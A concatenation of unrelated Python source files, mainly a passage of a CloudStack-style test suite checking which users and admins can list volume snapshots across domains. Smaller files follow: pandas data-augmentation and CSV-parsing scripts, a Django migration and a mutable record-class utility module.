snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="true", isrecursive="false")
self.debug("List as Regular User passing domainId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases when domainId is passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_false(self):
"""
Test listing of Snapshots by passing domainid,listall="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="false")
self.debug("List as Regular User passing domainId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing domainid,listall="false" and isrecusrive="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="false", isrecursive="true")
self.debug("List as Regular User passing domainId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing domainid,listall="false" and isrecusrive="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="false", isrecursive="false")
self.debug("List as Regular User passing domainId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases when domainId is passed with no listall parameter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid(self):
"""
Test listing of Snapshots by passing domainid parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id)
self.debug("List as Regular User passing domainId %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_true_rec_true(self):
"""
Test listing of Snapshots by passing domainid and isrecusrive="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, isrecursive="true")
self.debug("List as Regular User passing domainId - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid__rec_false(self):
"""
Test listing of Snapshots by passing domainid,isrecusrive="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, isrecursive="false")
self.debug("List as Regular User passing domainId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases when account and domainId is passed with listall =true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_true(self):
"""
Test listing of Snapshots by passing domainid,account,listall="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="true")
self.debug("List as Regular User passing domainId and accountId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing domainid,account,listall="true" and isrecusrive="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="true", isrecursive="true")
self.debug("List as Regular User passing domainId and accountId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing domainid,account,listall="true" and isrecusrive="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="true", isrecursive="false")
self.debug("List as Regular User passing domainId and accountId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases when account and domainId is passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_false(self):
"""
Test listing of Snapshots by passing domainid,account,listall="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="false")
self.debug("List as Regular User passing domainId and accountId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing domainid,account,listall="false" and isrecusrive="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="false", isrecursive="true")
self.debug("List as Regular User passing domainId and accountId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing domainid,account,listall="false" and isrecusrive="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="false", isrecursive="false")
self.debug("List as Regular User passing domainId and accountId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases when account and domainId is passed with listall not passed
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid(self):
"""
Test listing of Snapshots by passing domainid,account parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id)
self.debug("List as Regular User passing domainId and accountId %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_rec_true(self):
"""
Test listing of Snapshots by passing domainid,account and isrecusrive="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, isrecursive="true")
self.debug("List as Regular User passing domainId and accountId - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_rec_false(self):
"""
Test listing of Snapshots by passing domainid,account isrecusrive="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, isrecursive="false")
self.debug("List as Regular User passing domainId and accountId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Cross Domain access check
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_cross_domainid_accountid(self):
"""
Regular User should not be allowed to list Snapshotss of other accounts in the same domain
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
try:
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1b.user[0].username, domainid=self.domain_1.id)
self.fail("Regular User is able to use another account with in the same domain in listVirtualMachine call")
except Exception as e:
self.debug("List as Regular User passing domainId and accountId of another account %s" % e)
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_cross_domainid(self):
"""
Regular User should not be allowed to list Snapshotss of other accounts in other domains
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
try:
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_2_snapshot.id)
self.fail("Regular User is able to use another domain in listVirtualMachine call")
except Exception as e:
self.debug("List as Regular User passing domainId of a domain that user does not belong to %s" % e)
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_cross_domainid_accountid(self):
"""
Domain admin should not be allowed to list Snapshotss of accounts in other domains
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
try:
snapshotList = Snapshot.list(self.apiclient, account=self.account_d2a.user[0].username, domainid=self.domain_2_snapshot.id)
self.fail("Domain admin user is able to use another domain in listVirtualMachine call")
except Exception as e:
self.debug("List as domain admin passing domainId and accountId of another account %s" % e)
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_cross_domainid(self):
"""
Domain admin should not be allowed to list Snapshotss from other domains
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
try:
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_2_snapshot.id)
self.fail("Domain admin User is able to use another domain in listVirtualMachine call")
except Exception as e:
self.debug("List as domain admin passing domainId of a domain that user does not belong to %s" % e)
## List test cases relating to filter - id
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_domainadmin_owns(self):
"""
Domain admin should be able to list Snapshots that he owns by passing uuid in "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
SnapshotList = Snapshot.list(self.apiclient, id=self.vm_d1_snapshot.id)
self.assertNotEqual(SnapshotList,
None,
"Domain Admin is not able to list Snapshotss that he owns")
self.assertEqual(len(SnapshotList),
1,
"Domain Admin is not able to list Snapshotss that belongs to him")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_domainadmin_ownedbyusersindomain(self):
"""
Domain admin should be able to list Snapshots that is owned by any account in his domain by passing uuid in "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
SnapshotList1 = Snapshot.list(self.apiclient, id=self.vm_d1a_snapshot.id)
self.assertNotEqual(SnapshotList1,
None,
"Domain Admin is not able to list Snapshotss from his domain")
self.assertEqual(len(SnapshotList1),
1,
"Domain Admin is not able to list Snapshotss from his domain")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_domainadmin_ownedbyusersinsubdomain(self):
"""
Domain admin should be able to list Snapshots that is owned by any account in his sub-domain by passing uuid in "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
SnapshotList2 = Snapshot.list(self.apiclient, id=self.vm_d12b_snapshot.id)
self.assertNotEqual(SnapshotList2,
None,
"Domain Admin is not able to list Snapshotss from his sub domain")
self.assertEqual(len(SnapshotList2),
1,
"Domain Admin is not able to list Snapshotss from his sub domain")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_domainadmin_ownedbyusersnotindomain(self):
"""
Domain admin should not be able to list Snapshots that is owned by account that is not in his domain by passing uuid in "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
SnapshotList3 = Snapshot.list(self.apiclient, id=self.vm_d2_snapshot.id)
self.assertEqual(SnapshotList3,
None,
"Domain Admin is able to list Snapshotss from other domains!!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_domainadmin_ownedbyusersinsubdomain2(self):
"""
Domain admin should be able to list Snapshots that is owned by account that is in his sub domains by passing uuid in "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
SnapshotList4 = Snapshot.list(self.apiclient, id=self.vm_d111a_snapshot.id)
self.assertNotEqual(SnapshotList4,
None,
"Domain Admin is not able to list Snapshotss from his subdomain")
self.assertEqual(len(SnapshotList4),
1,
"Domain Admin is not able to list Snapshotss from his sub domains")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_rootadmin_owns(self):
"""
ROOT admin should be able to list Snapshots that is owned by account in his domains by passing uuid in "id" parameter
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
SnapshotList1 = Snapshot.list(self.apiclient, id=self.vm_a_snapshot.id)
self.assertNotEqual(SnapshotList1,
None,
"ROOT Admin not able to list Snapshotss that he owns")
self.assertEqual(len(SnapshotList1),
1,
"ROOT Admin not able to list Snapshotss that he owns")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_rootadmin_Snapshotsownedbyothers(self):
"""
ROOT admin should be able to list Snapshots that is owned by any account iby passing uuid in "id" parameter
"""
self.apiclient.connection.apiKey = self.default_apikey
self.apiclient.connection.securityKey = self.default_secretkey
SnapshotList1 = Snapshot.list(self.apiclient, id=self.vm_d2_snapshot.id)
SnapshotList2 = Snapshot.list(self.apiclient, id=self.vm_d11a_snapshot.id)
self.assertNotEqual(SnapshotList1,
None,
"ROOT Admin not able to list Snapshotss from other domains")
self.assertNotEqual(SnapshotList2,
None,
"ROOT Admin not able to list Snapshotss from other domains")
self.assertEqual(len(SnapshotList1),
1,
"ROOT Admin not able to list Snapshotss from other domains")
self.assertEqual(len(SnapshotList2),
1,
"ROOT Admin not able to list Snapshotss from other domains")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_user_own(self):
"""
Regular user should be able to list Snapshots that is owned by him by passing uuid in "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d11a_apikey
self.apiclient.connection.securityKey = self.user_d11a_secretkey
SnapshotList1 = Snapshot.list(self.apiclient, id=self.vm_d11a_snapshot.id)
self.assertNotEqual(SnapshotList1,
None,
"Regular User is not able to list Snapshotss that he owns")
self.assertEqual(len(SnapshotList1),
1,
"Regular User is not able to list Snapshotss that he owns")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_user_snapshotfromsamedomaindifferentaccount(self):
"""
Regular user should not be able to list Snapshots that is owned by different account in the same domain by passing uuid in "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d11a_apikey
self.apiclient.connection.securityKey = self.user_d11a_secretkey
SnapshotList2 = Snapshot.list(self.apiclient, id=self.vm_d11b_snapshot.id)
self.assertEqual(SnapshotList2,
None,
"Regular User is able to list Snapshotss from other accounts")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_by_id_as_user_snapshotfromotherdomain(self):
"""
Regular user should not be able to list Snapshots that is owned by different account in the different domain by passing uuid in "id" parameter
"""
self.apiclient.connection.apiKey = self.user_d11a_apikey
self.apiclient.connection.securityKey = self.user_d11a_secretkey
SnapshotList3 = Snapshot.list(self.apiclient, id=self.vm_d2_snapshot.id)
self.assertEqual(SnapshotList3,
None,
"Regular User is able to list Snapshotss from other domains")
@staticmethod
def generateKeysForUser(apiclient, account):
user = User.list(
apiclient,
account=account.name,
domainid=account.domainid
)[0]
return (User.registerUserKeys(
apiclient,
user.id
))
@staticmethod
def checkForExistenceOfValue(list, attributeValue):
if list is None:
return False
rowCount = len(list)
for num in range(rowCount):
if list[num].id == attributeValue:
return True
return False
| StarcoderdataPython |
4818136 | <gh_stars>0
import pandas as pd
#tech = ['sharpen','elasticdeformation','horizontalline','diagonalline','diagonalinverseline','verticalleftline','verticalrightline','severalrowsline',
# 'severalcolsline', 'severalcolsrowsline', 'superpixel', 'gaussianblur', 'additivegaussiannoise','dropout','translation','rotation90','rotation-90','rotation5','rotation-5']
tech2 = ['horizontalline','verticalleftline','verticalrightline','translation','superpixel', 'additivegaussiannoise',
'elasticdeformation','gaussianblur','sharpen','rotation5','rotation-5','dropout']
#df = pd.read_csv('/home/ahmed/Pictures/cogedis/cogedis_words_3/words.csv')
#df = pd.read_csv('/home/ahmed/Pictures/cogedis/data_crnn/augmented_without_test/digit.csv')
df = pd.read_csv('/home/ahmed/Pictures/cogedis/24072017/split/all/all_valid.csv')
df = df.astype(str)
df=df.ix[:,0:4]
df3=df[~df.manual_raw_value.str.match(r'^[\d,:.+\'%/-]*$')]
df = df[df.manual_raw_value.str.match(r'^[\d,:.+\'%/-]*$')]
#df = pd.read_csv('/home/ahmed/Pictures/cogedis/data_crnn/augmented_without_test/digit.csv')
dfs = []
def f(x):
df = pd.DataFrame({'id':[x['id'] + '_' + t for t in tech2],
'ocr':x['ocr'],
'manual_raw_value':x['manual_raw_value'],
'raw_value':x['raw_value']})
#print (df)
dfs.append(df)
df.apply(f, axis=1)
df1 = pd.concat(dfs)
#print (df1)
df2 = pd.concat([df, df1,df3], ignore_index=True).reindex_axis(df.columns, axis=1)
#df2.to_csv('/home/ahmed/Pictures/cogedis/cogedis_words_3/words_augmented.csv',sep=',')
df2.to_csv('/home/ahmed/Pictures/cogedis/24072017/split/all/all_valid_augmented.csv',sep=',',index=False)
| StarcoderdataPython |
1726666 | <gh_stars>0
import jyx
jyx.Jyx()
| StarcoderdataPython |
48397 | import pandas as pd
df = pd.DataFrame()
files = pd.read_csv('grandtlinks.csv')
try:
files['status'] = files['status'].astype(str)
header=False
except KeyError:
files['status'] = ''
header=True
for index, row in files.iterrows():
if row['status'] == 'parsed':
continue
filename = row['filename']
data = pd.read_csv(f'data/{filename}')
data = data.iloc[:-2]
fecha = data.fecha[0]
data = data.rename(columns={f'F{fecha}':'Puntaje'})
data['Cotizacion'] = data['Cotización'].str.replace(r'\.', '')
if 'GC.1' in data.columns:
data.rename(columns={'GC':'G', 'POS':'Puesto', 'GC.1':'GC'}, inplace=True)
data.drop(data.filter(regex=r'F\d+').columns, axis=1, inplace=True)
data.drop(columns=['PcG', 'PCG', 'AcG', 'PrG', 'PCT', 'CG', 'CT', 'PcG', 'AcT', 'Cotización'], axis=1, inplace=True, errors='ignore')
df = df.append(data)
files.at[index, 'status'] = 'parsed'
df.to_csv('grandtdata.csv', mode='a', header=header, index=False)
files.to_csv('grandtlinks.csv', index=False)
| StarcoderdataPython |
3331858 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-09-11 21:35
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('resale', '0003_change_coords'),
]
operations = [
migrations.AlterModelOptions(
name='resaleapartment',
options={'ordering': ('-id',), 'permissions': (('can_add_change_delete_all_resale', 'Имеет доступ к чужим данным по вторичке'),), 'verbose_name': 'объект вторичка', 'verbose_name_plural': 'объекты вторички'},
),
]
| StarcoderdataPython |
3225249 | <gh_stars>1-10
#!/usr/bin/env python3
"""Creates records, similar to collections.namedtuple.
Creates a record class like namedtuple, but mutable and with optional
attributes.
Optional attributes take a value or a callable (make sure to use a factory
function otherwise the same object will be shared among all the record
instances, like collections.defaultdict).
Example:
FirstRecord = records.Record('FirstRecord', ['attr1', 'attr2'], {'attr3': 0})
foo = FirstRecord(1, 2, attr3=3)
bar = FirstRecord(attr1=1, attr2=2, attr3=5)
class Second(FirstRecord):
required_attributes = ['second1']
optional_attributes = {'second2': 5}
# Second requires attr1, attr2, and second1.
baz = Second(1, 2, 3, second2=4)
"""
import copy
import itertools
import sys
class RecordClass(object):
__slots__ = ()
required_attributes = ()
optional_attributes = {}
def __init__(self, *args, **kwargs):
# First, check for the maximum number of arguments.
required_attributes = type(self).required_attributes
if len(args) + len(kwargs.keys()) < len(required_attributes):
raise ValueError(
'Invalid arguments', type(self), args, kwargs, self.__slots__)
# Second, check if there are any overlapping arguments.
conflicts = (frozenset(kwargs.keys()) &
frozenset(required_attributes[:len(args)]))
if conflicts:
raise TypeError(
'Keyword arguments conflict with positional arguments: %s',
conflicts)
# Third, check all required attributes are provided.
required_kwargs = set(kwargs.keys()) & set(required_attributes)
num_provided = len(args) + len(required_kwargs)
if num_provided != len(required_attributes):
raise TypeError(
'__init__ takes exactly %d arguments but %d were given: %s' % (
len(required_attributes), num_provided,
required_attributes))
for slot, arg in itertools.chain(
zip(type(self).required_attributes, args), kwargs.items()):
object.__setattr__(self, slot, arg)
# Set defaults.
for attr, value in type(self).optional_attributes.items():
if attr not in kwargs:
if callable(value):
value = value()
object.__setattr__(self, attr, value)
def __str__(self):
return self._str(type(self).all_attribute_names)
def _str(self, str_attrs):
attrs = []
for attr in str_attrs:
attrs.append('%s=%s' % (attr, repr(getattr(self, attr))))
return '%s(%s)' % (type(self).__name__, ', '.join(attrs))
__repr__ = __str__
def __eq__(self, other):
return (
self is other
or type(self) == type(other)
and self._isequal_fields(other, self.__slots__))
def __ne__(self, other):
return not self == other
def _isequal_fields(self, other, fields):
return all(getattr(self, attr) == getattr(other, attr)
for attr in fields)
def __copy__(self):
return type(self)(**{attr: getattr(self, attr)
for attr in self.__slots__})
def __deepcopy__(self, memo):
return type(self)(**{attr: copy.deepcopy(getattr(self, attr), memo)
for attr in self.__slots__})
def __getstate__(self):
"""Get the current state of all attributes."""
return {attr: getattr(self, attr) for attr in type(self).__slots__}
def __setstate__(self, state):
"""Set the state of attributes."""
for attr, value in state.iteritems():
setattr(self, attr, value)
class HashableRecordClass(RecordClass):
"""Hashable version of RecordClass.
Use this when the record is considered immutable enough to be hashable.
Immutability is not enforced, but is recommended.
Do not use if the record or any of its fields' values will ever be modified.
"""
def __hash__(self):
return hash(
tuple(hash(getattr(self, attr)) for attr in self.__slots__))
class RecordMeta(type):
def __new__(cls, name, bases, attrs):
required_attributes = [] # Combine the bases' req attrs first.
attrs['optional_attributes'] = attrs.get('optional_attributes', {})
for base in bases:
if issubclass(base, RecordClass):
# Check for repeated attributes first.
repeats = (set(required_attributes) &
set(base.required_attributes))
assert not repeats, 'Required attributes clash: %s' % repeats
repeats = (set(attrs['optional_attributes']) &
set(base.optional_attributes))
assert not repeats, 'Optional attributes clash: %s' % repeats
required_attributes.extend(base.required_attributes)
attrs['optional_attributes'].update(base.optional_attributes)
# If this class defines any attributes in a superclass's
# required attributes, make it an optional attribute with a
# default with the given value.
provided = set(base.required_attributes) & set(attrs)
for attr in provided:
required_attributes.remove(attr)
attrs['optional_attributes'][attr] = attrs.pop(attr)
# Allow the class to override optional attribute defaults
# as well.
provided = set(base.optional_attributes) & set(attrs)
for attr in provided:
attrs['optional_attributes'][attr] = attrs.pop(attr)
attrs['required_attributes'] = tuple(
required_attributes + list(attrs.get('required_attributes', ())))
attrs['__slots__'] = (tuple(attrs['required_attributes']) +
tuple(attrs['optional_attributes'].keys()))
return super(RecordMeta, cls).__new__(cls, name, bases, attrs)
def __str__(cls):
return '<Record: %s>' % cls.__name__
__repr__ = __str__
def __eq__(cls, other):
if not isinstance(other, RecordMeta):
return False
return (
cls is other
or cls.required_attributes == other.required_attributes
and cls.optional_attributes == other.optional_attributes)
def __ne__(self, other):
return not self == other
def __hash__(cls):
return hash(
(cls.required_attributes,
frozenset(cls.optional_attributes.items())))
@property
def all_attribute_names(cls):
return itertools.chain(
cls.required_attributes,
cls.optional_attributes.keys())
def Record(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
cls = RecordMeta(cls_name, (RecordClass,), attrs)
# Copied from collections.py, the bottom of namedtuple:
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in enviroments where
# sys._getframe is not defined (Jython for example).
if hasattr(sys, '_getframe'):
cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
return cls
def HashableRecord(cls_name, required_attributes=(), optional_attributes={}):
attrs = {'required_attributes': tuple(required_attributes),
'optional_attributes': dict(optional_attributes)}
return RecordMeta(cls_name, (HashableRecordClass,), attrs)
def CopyRecord(record, **field_overrides):
"""Copies a record and its fields, recurses for any field that is a Record.
For records that have nested mutable fields, use copy.deepcopy.
Args:
record: A Record instance to be copied.
**field_overrides: Fields and their values to override in the new copy.
Returns: A copy of the given record with any fields overridden.
"""
fields = field_overrides
for field in record.__slots__:
if field in field_overrides:
continue
value = getattr(record, field)
if isinstance(value, RecordClass):
# Recurse for records.
new_value = CopyRecord(value)
else:
new_value = copy.copy(value)
fields[field] = new_value
return type(record)(**fields)
| StarcoderdataPython |
1605749 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
